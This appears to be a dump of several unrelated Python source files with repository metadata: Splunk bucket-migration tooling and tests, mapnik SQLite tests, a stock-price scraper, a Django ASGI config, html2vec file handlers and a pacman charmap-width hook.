        myParser = destSubParser.add_parser(cmdName)
        myParser.set_defaults(func=self.run)
        myParser.add_argument("--actually-move", action="store_true",
                help="Without this, the actual move commands will not be run.")

    def run(self, args):
        """Walk $SPLUNK_DB/<staging>/<index>/<bucketType>/<bucket> and move
        each bucket into $SPLUNK_DB/<indexDir>/<db|colddb|thaweddb>/."""
        self._args = args
        stagingDestDirBase = os.path.join(os.environ["SPLUNK_DB"], STAGING_DIR)
        if not os.path.exists(stagingDestDirBase):
            # BUGFIX: the "%s" placeholder was previously never filled in
            # (the message printed with a literal %s); supply the path.
            # Also uses the py2/py3-portable raise form.
            raise Exception("Staging directory path=\"%s\" does not exist,"
                    " are you sure you downloaded data on this instance?"
                    % stagingDestDirBase)
        if self._args.actually_move:
            # Refuse to shuffle bucket dirs underneath a running splunkd.
            proc = subprocess.Popen(["splunk", "status"], stdout=subprocess.PIPE)
            proc.communicate()
            if 0 == proc.returncode:
                raise Exception("This command must not be used while Splunk is running.")
        movePairs = []
        dirsToRemove = []
        for indexName in os.listdir(stagingDestDirBase):
            thisIdxDir = os.path.join(stagingDestDirBase, indexName)
            dirsToRemove.append(thisIdxDir)
            for bucketType in os.listdir(thisIdxDir):
                thisBucketTypeDir = os.path.join(thisIdxDir, bucketType)
                dirsToRemove.append(thisBucketTypeDir)
                for bucketName in os.listdir(thisBucketTypeDir):
                    thisBucketDir = os.path.join(thisBucketTypeDir, bucketName)
                    # FIXME: hack per freezeBucketToS3.py ...
                    # Staging uses display index names; the destination uses
                    # the on-disk (searchable) directory name.
                    realIndexDirName = getSearchableIndexName(indexName)
                    destPath = os.path.join(os.environ["SPLUNK_DB"], realIndexDirName,
                            bucketDirTypeToDirName(bucketType), bucketName)
                    if not self._args.actually_move:
                        print("Will move: %s ==> %s" % (thisBucketDir, destPath))
                    movePairs.append((thisBucketDir, destPath))
        if self._args.actually_move:
            for src, dst in movePairs:
                shutil.move(src, dst)
            # Children were appended after their parents, so remove in
            # reverse order to only ever rmdir empty directories.
            for oneDir in reversed(dirsToRemove):
                os.rmdir(oneDir)
            os.rmdir(stagingDestDirBase)
        print("\nDone.")
def main(rawArgs):
    """Build the top-level argument parser, register every subcommand, parse
    *rawArgs* and dispatch to the selected subcommand's run() method."""
    # Most argument parsing will be delegated to the subcommands.
    mainArgParser = argparse.ArgumentParser()
    subParsers = mainArgParser.add_subparsers()
    # Instantiating each command registers its subparser; keep the instances
    # referenced here so there is no lifecycle ambiguity.
    registeredCmds = (
        CMD_GenBucketlistWarmCold(subParsers, "gen-bucketlist-warm-cold"),
        CMD_GenChecksumsFromBucketlist(subParsers, "gen-checksums-from-bucketlist"),
        CMD_GenRandBucketOwnersFromBucketList(subParsers, "gen-rand-bucket-owners-from-bucketlists"),
        CMD_UploadBucketsToS3FromBucketList(subParsers, "upload-buckets-to-s3-from-bucketlist"),
        CMD_ListAllSplunkBucketsFromS3(subParsers, "list-all-splunk-buckets-from-s3"),
        CMD_GenNewBucketOwnersFromS3BucketList(subParsers, "gen-new-bucket-owners-from-s3-bucketlist"),
        CMD_DownloadBucketsToStagingDir(subParsers, "download-buckets-to-staging-dir"),
        CMD_VerifyDownloadedFiles(subParsers, "verify-downloaded-files"),
        CMD_MoveStagedDataToIndexes(subParsers, "move-staged-data-to-indexes"),
    )
    # Parses sys.argv implicitly.
    parsed = mainArgParser.parse_args(rawArgs)
    parsed.func(parsed)

### metadataCollection.generate_missing_checksums()
### metadataCollection.write()
### ### TODO: lazy-delete aged-out buckets
### #generate_missing_md5sums(instanceGuid, allBuckets)
### #generate_s3_upload_commands(instanceGuid, allBuckets)

if __name__ == "__main__":
    main(sys.argv[1:])
def test_filter_internal_index_dirs():
    """Test function: make sure the correct index paths are removed.

    Internal-only index dirs (fishbucket, _introspection) must be filtered
    out; all other paths must survive in their original order.
    """
    base = "/home/amrit/files/cluster/test/splunk/var/lib/splunk"
    def pathsFor(idxDir):
        # db/colddb/thaweddb triple for one index directory.
        return ["%s/%s/%s" % (base, idxDir, sub)
                for sub in ("db", "colddb", "thaweddb")]
    dirsBefore = (pathsFor("defaultdb") + pathsFor("summarydb")
            + pathsFor("fishbucket") + ["/tmp/bleh"]
            + pathsFor("blockSignature") + pathsFor("historydb")
            + pathsFor("_introspection") + pathsFor("audit"))
    expectedDirsAfter = (pathsFor("defaultdb") + pathsFor("summarydb")
            + ["/tmp/bleh"] + pathsFor("blockSignature")
            + pathsFor("historydb") + pathsFor("audit"))
    # Construct the necessary data structures.
    indexPathObjsBefore = [ IndexLocation("foo", x, "homePath") for x in dirsBefore ]
    indexPathObjsAfter = filter_internal_index_dirs(indexPathObjsBefore)
    dirsAfter = [ x.dirPath for x in indexPathObjsAfter ]
    # Compare the raw filepaths to verify.
    # BUGFIX: the EXPECTED/ACTUAL values in the failure message were swapped.
    assert dirsAfter == expectedDirsAfter, \
        "Filtered dirs did not match! EXPECTED:\n%s\n\nACTUAL:\n%s\n" % (
            expectedDirsAfter, dirsAfter)
def test_splunkDBPaths():
# Must be structured like indexes.conf. These paths don't need to exist
# for this test.
indexConfig = {
"default" : {
},
"volume:foobar" : {
"path" : "/data/splunkvolume1"
},
"volume:badvol" : {
"badParam" : "bar",
},
"idx1" : {
"homePath" : "/data/idx1/db",
"coldPath" : "/data/idx1/colddb",
"thawedPath" : "/data/idx1/thawed"
},
"idx2" : {
"homePath" : "/data/idx2/db",
"coldPath" : "/data/idx2/colddb",
"thawedPath" : "/data/idx2/thawed"
},
"idx3" : {
"homePath" : "volume:foobar/idx3/db",
"coldPath" : "volume:foobar/idx3/colddb",
"thawedPath" : "volume:foobar/idx3/thawed"
},
"idx4" : {
"badParam" : "foo"
},
"idx5" : {
"disabled" : "true",
}
}
outPaths = splunkDBPaths(indexConfig)
outPaths2 = splunkDBPaths(indexConfig)
assert outPaths == computed_db_paths
assert outPaths2 == outPaths2
# 3 indexes * 3 paths = 9.
assert 9 == len(outPaths)
for idx in outPaths:
assert isinstance(idx, IndexLocation)
# This is sorted.
outPathsTruth = (
("idx1", "coldPath", "/data/idx1/colddb"),
("idx1", "homePath", "/data/idx1/db"),
("idx1", "thawedPath", "/data/idx1/thawed"),
("idx2", "coldPath", "/data/idx2/colddb"),
("idx2", "homePath", "/data/idx2/db"),
("idx2", "thawedPath", "/data/idx2/thawed"),
("idx3", "coldPath", "/data/splunkvolume1/idx3/colddb"),
("idx3", "homePath", "/data/splunkvolume1/idx3/db"),
("idx3", "thawedPath", "/data/splunkvolume1/idx3/thawed"),
)
for op in outPaths:
print op.indexName, op.dirPath, op.dirType
print outPathsTruth
# Sort output paths by all 3 keys...
sortedOP = sorted(outPaths, key=operator.attrgetter(
"indexName", "dirType", "dirPath"))
for i in range(len(outPathsTruth)):
assert outPathsTruth[i] == \
(sortedOP[i].indexName, sortedOP[i].dirType, sortedOP[i].dirPath)
def test_fileMd5Hash():
    """fileMd5Hash must produce the md5sum-compatible digest of a stream."""
    # 128000 chars: forces the hashing helper to loop over at least two
    # chunked reads (lazy binary math).
    payload = "x" * 128000
    # Gen'd with: echo | awk '{for (i=0; i<128000; ++i){printf("x");}}' | md5sum.
    expected = "8b9717dc588d653855659cb3a167ee38"
    assert expected == fileMd5Hash(StringIO.StringIO(payload))
def test_RoundRobinFileReader():
    """Lines must come back interleaved round-robin across the files, with
    exhausted files dropping out of the rotation."""
    fileContents = (
        ["foo", "bar", "baz", "huh"],
        ["abcde", "fghij", "klmno", "pqrst", "uvwxy"],
        ["12", "34", "56"],
    )
    fakeFds = [StringIO.StringIO(str.join("\n", lines) + "\n")
               for lines in fileContents]
    rrFd = RoundRobinFileReader(fakeFds)
    assert(3 == rrFd.numFiles())
    rrFdReadOrderTruth = (
        "foo", "abcde", "12",
        "bar", "fghij", "34",
        "baz", "klmno", "56",
        "huh", "pqrst", "uvwxy")
    for lineCounter, line in enumerate(rrFd):
        assert(line == rrFdReadOrderTruth[lineCounter] + "\n")
def test_CMD_GenBucketlistWarmCold():
    """Smoke-test the gen-bucketlist-warm-cold subcommand end to end."""
    # Undo cache.  splunkDBPaths caches into this module-level global; reset
    # it so this test recomputes rather than reusing a prior test's result.
    global computed_db_paths
    computed_db_paths = None
    args = ["gen-bucketlist-warm-cold"]
    main(args)
### def test_CMD_GenChecksumsFromBucketlist():
### args = ["gen-checksums-from-bucketlist"]
### main(args)
### def test_CMD_GenRandBucketOwnersFromBucketList(object):
### args = ["gen-rand-bucket-owners-from-bucketlists"]
### main(args)
| [
"esix@splunk.com"
] | esix@splunk.com |
8d74b1e0bb854a72bb32c37fb556c7fe405b41fd | 36dfa26234b46cb8e2fdeb680fc4b9ea20d594ba | /purelung/models/suppression/__init__.py | 6bb65e6a8b08fe7b607f353551d47832d0b11f29 | [
"MIT"
] | permissive | DanisAlukaev/Purelung | 862b80071ce13f44a4caab5f297fa2679d6aab66 | af7d403460ad20327488cd04af434377c3c30f9b | refs/heads/master | 2023-06-06T22:53:22.726745 | 2020-08-03T19:56:41 | 2020-08-03T19:56:41 | 284,793,444 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105 | py | from purelung.models.suppression.bone_suppression_pt import load_bone_model_pytorch, get_suppressed_image | [
"d.alukaev@innopolis.university"
] | d.alukaev@innopolis.university |
87b4c9c295b5f43b508c4f5062977f0f628852e2 | 4a84ef702269eed582b04dbed979a24607579f52 | /src/mapnik/tests/python_tests/sqlite_rtree_test.py | 2d28adac0266d3439eb51f6e9cc4d9c5da04e236 | [] | no_license | olibook/pymapnik2 | 9ef766d759afc3efeccd988bfb7239bd73cac01e | c409fa150e203ff85e14b8fd40063267a6802e1c | refs/heads/master | 2016-08-04T11:51:35.987664 | 2013-02-18T16:01:10 | 2013-02-18T16:01:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,302 | py | #!/usr/bin/env python
from nose.tools import *
from mapnik.tests.python_tests.utilities import execution_path
from Queue import Queue
import threading
import os, mapnik
import sqlite3
def setup():
    """Nose setup hook: run the tests from a predictable working dir."""
    # All of the paths used are relative, if we run the tests
    # from another directory we need to chdir()
    os.chdir(execution_path('.'))
# Number of threads that open the datasource concurrently in the rtree
# creation race test.
NUM_THREADS = 10
# Expected feature count of the test database below.
TOTAL = 245
DB = '../data/sqlite/world.sqlite'
TABLE= 'world_merc'
def create_ds():
    # Open the SQLite datasource and force a full read; as a side effect the
    # plugin builds the .index rtree file if it is missing.
    ds = mapnik.SQLite(file=DB,table=TABLE)
    fs = ds.all_features()
# Only define the sqlite tests when the plugin is actually available.
if 'sqlite' in mapnik.DatasourceCache.instance().plugin_names():

    def test_rtree_creation():
        """Many threads opening the same datasource at once must produce
        exactly one valid rtree index file."""
        index = DB +'.index'
        if os.path.exists(index):
            os.unlink(index)
        # Race NUM_THREADS datasource opens against each other.
        threads = []
        for i in range(NUM_THREADS):
            t = threading.Thread(target=create_ds)
            t.start()
            threads.append(t)
        for i in threads:
            i.join()
        eq_(os.path.exists(index),True)
        conn = sqlite3.connect(index)
        cur = conn.cursor()
        try:
            cur.execute("Select count(*) from idx_%s_GEOMETRY" % TABLE.replace("'",""))
            conn.commit()
            eq_(cur.fetchone()[0],TOTAL)
        except sqlite3.OperationalError:
            # don't worry about testing # of index records if
            # python's sqlite module does not support rtree
            pass
        cur.close()
        # With the index present, a full read returns every feature.
        ds = mapnik.SQLite(file=DB,table=TABLE)
        fs = ds.all_features()
        eq_(len(fs),TOTAL)
        os.unlink(index)
        # With use_spatial_index=False no index file may be (re)created.
        ds = mapnik.SQLite(file=DB,table=TABLE,use_spatial_index=False)
        fs = ds.all_features()
        eq_(len(fs),TOTAL)
        eq_(os.path.exists(index),False)
        # With use_spatial_index=True the index is rebuilt and every feature
        # must be findable via a bbox query on its own envelope.
        ds = mapnik.SQLite(file=DB,table=TABLE,use_spatial_index=True)
        fs = ds.all_features()
        for feat in fs:
            query = mapnik.Query(feat.envelope())
            selected = ds.features(query)
            eq_(len(selected.features)>=1,True)
        eq_(os.path.exists(index),True)
        os.unlink(index)
    def test_geometry_round_trip():
        """Write a WKB point into a fresh sqlite db, then verify mapnik and
        raw sqlite both read back byte-identical geometry."""
        test_db = '/tmp/mapnik-sqlite-point.db'
        ogr_metadata = True
        # create test db
        conn = sqlite3.connect(test_db)
        cur = conn.cursor()
        cur.execute('''
             CREATE TABLE IF NOT EXISTS point_table
             (id INTEGER PRIMARY KEY AUTOINCREMENT, geometry BLOB, name varchar)
             ''')
        # optional: but nice if we want to read with ogr
        if ogr_metadata:
            cur.execute('''CREATE TABLE IF NOT EXISTS geometry_columns (
                        f_table_name VARCHAR,
                        f_geometry_column VARCHAR,
                        geometry_type INTEGER,
                        coord_dimension INTEGER,
                        srid INTEGER,
                        geometry_format VARCHAR )''')
            cur.execute('''INSERT INTO geometry_columns
                        (f_table_name, f_geometry_column, geometry_format,
                        geometry_type, coord_dimension, srid) VALUES
                        ('point_table','geometry','WKB', 1, 1, 4326)''')
        conn.commit()
        cur.close()
        # add a point as wkb (using mapnik) to match how an ogr created db looks
        x = -122 # longitude
        y = 48 # latitude
        wkt = 'POINT(%s %s)' % (x,y)
        # little endian wkb (mapnik will auto-detect and ready either little or big endian (XDR))
        wkb = mapnik.Path.from_wkt(wkt).to_wkb(mapnik.wkbByteOrder.NDR)
        values = (None,sqlite3.Binary(wkb),"test point")
        cur = conn.cursor()
        cur.execute('''INSERT into "point_table" (id,geometry,name) values (?,?,?)''',values)
        conn.commit()
        cur.close()

        def make_wkb_point(x,y):
            # Hand-assemble a little-endian WKB point for comparison.
            import struct
            byteorder = 1; # little endian
            endianess = ''
            if byteorder == 1:
                endianess = '<'
            else:
                endianess = '>'
            geom_type = 1; # for a point
            return struct.pack('%sbldd' % endianess, byteorder, geom_type, x, y)
        # confirm the wkb matches a manually formed wkb
        wkb2 = make_wkb_point(x,y)
        eq_(wkb,wkb2)
        # ensure we can read this data back out properly with mapnik
        ds = mapnik.Datasource(**{'type':'sqlite','file':test_db, 'table':'point_table'})
        fs = ds.featureset()
        feat = fs.next()
        eq_(feat.id(),1)
        eq_(feat['name'],'test point')
        geoms = feat.geometries()
        eq_(len(geoms),1)
        eq_(geoms.to_wkt(),'Point(-122.0 48.0)')
        # ensure it matches data read with just sqlite
        cur = conn.cursor()
        cur.execute('''SELECT * from point_table''')
        conn.commit()
        result = cur.fetchone()
        cur.close()
        feat_id = result[0]
        eq_(feat_id,1)
        name = result[2]
        eq_(name,'test point')
        geom_wkb_blob = result[1]
        eq_(str(geom_wkb_blob),geoms.to_wkb(mapnik.wkbByteOrder.NDR))
        new_geom = mapnik.Path.from_wkb(str(geom_wkb_blob))
        eq_(new_geom.to_wkt(),geoms.to_wkt())
        # cleanup
        os.unlink(test_db)
        os.unlink(test_db + '.index')
if __name__ == "__main__":
    setup()
    # Run every function whose name contains 'test_'.
    # NOTE(review): eval() on names from dir() works here because the module
    # controls its own namespace, but a plain getattr()-based loop would be
    # safer and clearer.
    [eval(run)() for run in dir() if 'test_' in run]
| [
"kiorky@cryptelium.net"
] | kiorky@cryptelium.net |
bc6f95608de9d9cb30bf5bd3e63638ab7179fcff | c5463565ac436c8bfd430c32f57146669b533850 | /3.StockWithRegex/getStockOther.py | 3afd2371c7c9fe917850954ed20188a34c9a19a5 | [] | no_license | AndyDaly90/PythonScraping | 471a2fd64fd5b12864eb3a9896abc9399bfa3843 | 12e8b71c3acb6d94c033b2fffbfa944fc2c317cd | refs/heads/master | 2016-09-01T12:52:00.651607 | 2016-02-02T16:00:06 | 2016-02-02T16:00:06 | 50,930,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | from __future__ import print_function
import urllib
import re
# Fetch the Google Finance quote page for Apple (AAPL).
# NOTE: urllib.urlopen is Python 2 only; Python 3 moved it to urllib.request.
htmlFile = urllib.urlopen("https://www.google.com/finance?q=AAPL")
htmlText = htmlFile.read()
# Non-greedily capture the text of every <span> whose id starts with "ref_"
# and ends with "_l" (the quote fields on the page markup).
regex = '<span id="ref_[^.]*_l">(.+?)</span>'
pattern = re.compile(regex)
# re.findall accepts a pre-compiled pattern; returns the captured groups.
result = re.findall(pattern, htmlText)
print(result)
| [
"andrew.daly@students.ittralee.ie"
] | andrew.daly@students.ittralee.ie |
82f2cb74ac91d8562d6bf1261c3940d19915f59e | 5e6ff89fcaec0f93da551e0c2237f272c8967064 | /Anudip/Anudip/asgi.py | 0f481d1a1ddb24c71d86298e6017f89a2f1d0ffe | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | IndiaCFG3/team-63 | 10478c72adba453832571239c3ec6c3573ff6ac9 | a4cfbc96b977faade9c185ac5de7754e6fef21fd | refs/heads/master | 2023-02-09T16:28:49.196488 | 2021-01-06T15:39:19 | 2021-01-06T15:39:19 | 287,280,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
ASGI config for Anudip project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Register the default settings module; a value already present in the
# environment takes precedence (setdefault does not overwrite it).
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Anudip.settings')
# Module-level ASGI callable that ASGI servers import as ``application``.
application = get_asgi_application()
| [
"jitensidhpura2000@gmail.com"
] | jitensidhpura2000@gmail.com |
8ac469d250354ff770e368d0dc803cc543d5ac0d | c42908fce35bc2afb10abd924cfd13d5fa286205 | /html2vec/base/io/basefilehandlers.py | 30f19a526fdb753f0bc6b1578280d70ce6dcfae6 | [
"MIT"
] | permissive | dpritsos/html2vec | b3866f05e7e1c1cb61f40b8f038c1a05a89a9faa | be5629d6dc2665891472c5795c191286f0de31e7 | refs/heads/master | 2023-05-13T08:30:24.485797 | 2021-06-05T07:29:06 | 2021-06-05T07:29:06 | 1,896,404 | 8 | 0 | null | 2018-10-20T13:10:43 | 2011-06-14T19:54:52 | Python | UTF-8 | Python | false | false | 3,689 | py | #
# Module: Base File Handlers
#
# Author: Dimitiros Pritsos
#
# License: BSD Style
#
# Last update: Please refer to the GIT tracking
#
""" html2vect.base.io.basefilehandlers: submodule of `html2vect` module defines the class
BasePathHandler and BaseFileHandler """
import codecs
import os
def copyfile(source, dest):
    """Copy the file at *source* to *dest* in 1 MiB binary chunks.

    Both files are opened with ``with`` so they are closed even if the
    read or write raises mid-copy (the previous open/close pairing leaked
    descriptors on error).
    """
    with open(source, 'rb') as source_f, open(dest, 'wb') as dest_f:
        while True:
            copy_buffer = source_f.read(1024 * 1024)
            if not copy_buffer:
                # Empty read means EOF.
                break
            dest_f.write(copy_buffer)
def movefile(source, dest):
    """Move *source* to *dest* by hard-linking then deleting the original.

    NOTE(review): os.link only works when *source* and *dest* live on the
    same filesystem and raises if *dest* already exists -- confirm both
    assumptions hold for all callers before relying on this helper.
    """
    os.link(source, dest)
    os.unlink(source)
def _top_level_files(path):
    """Return the file names directly inside *path* (no recursion).

    Mirrors the original ``[... for ... in os.walk(path)][0]`` trick:
    the first tuple from os.walk holds the top directory's file list, and
    a missing *path* still raises IndexError (os.walk yields nothing).
    """
    return [files_n_paths[2] for files_n_paths in os.walk(path)][0]


def file_list_frmpaths(basepath, filepath_l):
    """Return a sorted list of full file paths found under the given path(s).

    basepath   -- common prefix prepended to every path; None is treated as ''.
    filepath_l -- a single path string, or a list of path strings.
    Raises Exception for any other argument type.

    NOTE: for a string argument the file name is appended directly
    (``basepath + filepath_l + fname``) while for a list a '/' separator is
    inserted; callers passing a plain string must therefore include the
    trailing separator themselves. Preserved as-is for backward compatibility.
    """
    if basepath is None:
        basepath = ''
    if isinstance(filepath_l, str):
        fname_lst = [
            basepath + filepath_l + fname
            for fname in _top_level_files(basepath + filepath_l)
        ]
    elif isinstance(filepath_l, list):
        fname_lst = list()
        for filepath in filepath_l:
            fname_lst.extend(
                basepath + filepath + '/' + fname
                for fname in _top_level_files(basepath + filepath)
            )
    else:
        raise Exception(
            "A String or a list of Strings was Expected as input - Stings should be file-paths"
        )
    # For ease of usage the filename list should be returned sorted
    fname_lst.sort()
    return fname_lst
class BaseFileHandler(object):
    """Iterate over a list of text files, yielding each file's decoded contents.

    Typical use: ``for text in handler.load_files(fname_lst): ...``
    A file that cannot be opened or decoded yields None (the error is printed).
    """

    def __init__(self):
        # Paths queued for iteration and the index of the next file to read.
        self.filename_lst = []
        self.file_count = None

    def __iter__(self):
        return self

    def next(self):
        """Return the decoded contents of the next queued file.

        Raises StopIteration when every file in filename_lst has been read.
        """
        if len(self.filename_lst) == self.file_count:
            raise StopIteration
        xhtml = self.__load_file(
            self.filename_lst[self.file_count], self.encoding, self.error_handling
        )
        self.file_count += 1
        return xhtml

    # BUGFIX: Python 3's iterator protocol calls __next__; keep next() as
    # the primary spelling for existing (Python 2 style) callers.
    __next__ = next

    def __load_file(self, filename, encoding='utf-8', error_handling='strict'):
        """Read one file with the given codec; return its text, or None on error."""
        try:
            fenc = codecs.open(filename, 'rb', encoding, error_handling)
        except Exception as e:
            print("BaseFileHandler.__load_file() FILE %s ERROR: %s" % (filename, e))
            return None
        try:
            fstr = fenc.read()
        except Exception as e:
            print("BaseFileHandler.__load_file() FILE %s ERROR: %s" % (filename, e))
            return None
        finally:
            fenc.close()
        return fstr

    def load_files(self, filename_l, encoding='utf-8', error_handling='strict'):
        """Load one file (string argument) or set up iteration (list argument).

        Returns the file's text for a single path, or self (an iterator over
        the decoded contents) for a list of paths.
        """
        if isinstance(filename_l, str):
            return self.__load_file(filename_l, encoding, error_handling)
        elif isinstance(filename_l, list):
            self.filename_lst = filename_l
            self.file_count = 0
            self.encoding = encoding
            self.error_handling = error_handling
            return self.__iter__()
        else:
            raise Exception("A String or a list of Strings was Expected as input")

    def load_frmpaths(self, basepath, filepath_l, encoding='utf-8', error_handling='strict'):
        """Return [[fname, contents], ...] for every file under the given path(s).

        This loads everything eagerly and requires a high amount of memory!
        """
        # BUGFIX: file_list_frmpaths is a module-level function, not a method;
        # calling it through self raised AttributeError.
        fname_lst = file_list_frmpaths(basepath, filepath_l)
        return [[fname, fstr] for fname, fstr in zip(
            fname_lst, self.load_files(fname_lst, encoding, error_handling))]
| [
"dpritsos@extremepro.gr"
] | dpritsos@extremepro.gr |
f3347fc64b9df518214370907ad199782662a729 | 0b9fdbb0c6e2cba0a89a9a9487584fed8024f737 | /etc/pacman.d/hooks/update-charmaps-UTF-8.py | 21050b1469b5ed112de463846bd61f4ef77491f9 | [] | no_license | MaskRay/Config | 0aca02be5f3846c4094c8e31975a504f884924a4 | c5017bb4116071ae879dc67758130468f4da7775 | refs/heads/master | 2023-08-17T00:11:26.782184 | 2023-08-16T21:15:04 | 2023-08-16T21:15:04 | 2,502,286 | 232 | 53 | null | 2022-02-12T09:18:36 | 2011-10-03T02:18:54 | Emacs Lisp | UTF-8 | Python | false | false | 2,164 | py | #!/usr/bin/env python3
import gzip, re, subprocess
def encode(x):
    """Format code point *x* as a charmap symbolic name, e.g. 0x41 -> '<U00000041>'."""
    return '<U%08X>' % x
# Accumulated column-width table: code point -> width value ('0'/'1'/'2'
# strings as parsed below, or the int 2 for the overrides), plus the
# highest code point seen so the rewrite loop knows where to stop.
width = {}
mx = 0
is_width = False
# read original width information from charmaps/UTF-8
with gzip.open('/usr/share/i18n/charmaps/UTF-8.gz') as f:
    lines = f.read().decode().splitlines()
    for line in lines:
        if line == 'WIDTH':
            is_width = True
        elif line == 'END WIDTH':
            is_width = False
        elif is_width:
            # Entries look like '<U0041>\t1' or ranges '<U0041>...<U005A>\t1'.
            m = re.match(r'<U(\w+)>(?:\.\.\.<U(\w+)>)?\t(\d)$', line)
            if m:
                head = int(m.group(1), 16)
                last = int(m.group(2), 16) if m.group(2) else head
                mx = max(mx, last)
                for code in range(head, last+1):
                    width[code] = m.group(3)
# incomplete list of full-width characters
for i, j in [(0x25a0, 0x27c0), # Geometric Shapes, Miscellaneous Symbols, Dingbats
             (0x2b00, 0x2bf0), # Miscellaneous Symbols and Arrows
             (0x1f300, 0x1f9c1)]: # Miscellaneous Symbols and Pictographs ... Supplemental Symbols and Pictographs
    # NOTE(review): these overrides store the int 2 while the parsed table
    # stores strings, so the run-merging comparison below never merges an
    # overridden range with an adjacent parsed one -- confirm that is intended.
    for code in range(i, j):
        width[code] = 2
# print new charmaps/UTF-8
with gzip.open('/usr/share/i18n/charmaps/UTF-8.gz', 'wb') as f:
    for line in lines:
        if line == 'WIDTH':
            is_width = True
            f.write((line+'\n').encode())
            # Re-emit the whole WIDTH section from the merged table,
            # collapsing consecutive code points with equal width values
            # into '<U...>...<U...>' range entries.
            i = 0
            while i <= mx:
                if i in width:
                    j = i+1
                    while j in width and width[i] == width[j]:
                        j += 1
                    if i == j-1:
                        f.write('{}\t{}\n'.format(encode(i), width[i]).encode())
                    else:
                        f.write('{}...{}\t{}\n'.format(encode(i), encode(j-1), width[i]).encode())
                    i = j
                else:
                    i += 1
        elif line == 'END WIDTH':
            is_width = False
            f.write((line+'\n').encode())
        elif not is_width:
            # Copy everything outside the original WIDTH section verbatim;
            # lines inside it are skipped because is_width is still True.
            f.write((line+'\n').encode())
# Rebuild the en_US.UTF-8 locale so the modified charmap takes effect.
subprocess.run('localedef -i en_US -c -f UTF-8 -A /usr/share/locale/locale.alias en_US.UTF-8', shell=True)
| [
"i@maskray.me"
] | i@maskray.me |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.